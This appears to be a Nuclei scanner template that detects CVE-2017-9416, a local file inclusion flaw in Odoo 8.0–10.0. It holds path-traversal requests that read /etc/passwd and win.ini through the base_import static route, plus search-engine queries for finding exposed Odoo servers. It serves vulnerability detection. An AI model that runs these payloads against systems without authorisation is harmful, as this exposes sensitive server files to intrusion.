id: CVE-2017-9416 info: name: Odoo 8.0/9.0/10.0 - Local File Inclusion author: Co5mos severity: medium description: | Odoo 8.0, 9.0, and 10.0 are susceptible to local file inclusion via tools.file_open. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. impact: | Allows an attacker to read arbitrary files on the server. remediation: | Upgrade to a patched version of Odoo or apply the necessary security patches. reference: - https://github.com/odoo/odoo/issues/17394 - https://nvd.nist.gov/vuln/detail/CVE-2017-9416 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2017-9416 cwe-id: CWE-22 epss-score: 0.01187 epss-percentile: 0.85048 cpe: cpe:2.3:a:odoo:odoo:8.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: odoo product: odoo shodan-query: - cpe:"cpe:2.3:a:odoo:odoo" - http.title:"odoo" fofa-query: title="odoo" google-query: intitle:"odoo" tags: cve2017,cve,odoo,lfi http: - method: GET path: - "{{BaseURL}}/base_import/static/c:/windows/win.ini" - "{{BaseURL}}/base_import/static/etc/passwd" stop-at-first-match: true matchers-condition: or matchers: - type: dsl dsl: - "regex('root:.*:0:0:', body)" - "status_code == 200" condition: and - type: dsl dsl: - "contains(body, 'bit app support')" - "contains(body, 'fonts')" - "contains(body, 'extensions')" - "status_code == 200" condition: and # digest: 4a0a004730450221008c115e718d85457df3f04a77cdf612a8a6e44b1a73e97bf8cd5b7b8cb9c7a4f602201566150bfed49300f3c98e4c961c6f0ccb37ad3757ea3229129cbb69f63ae0bf:922c64590222798bb761d5b6d8e72950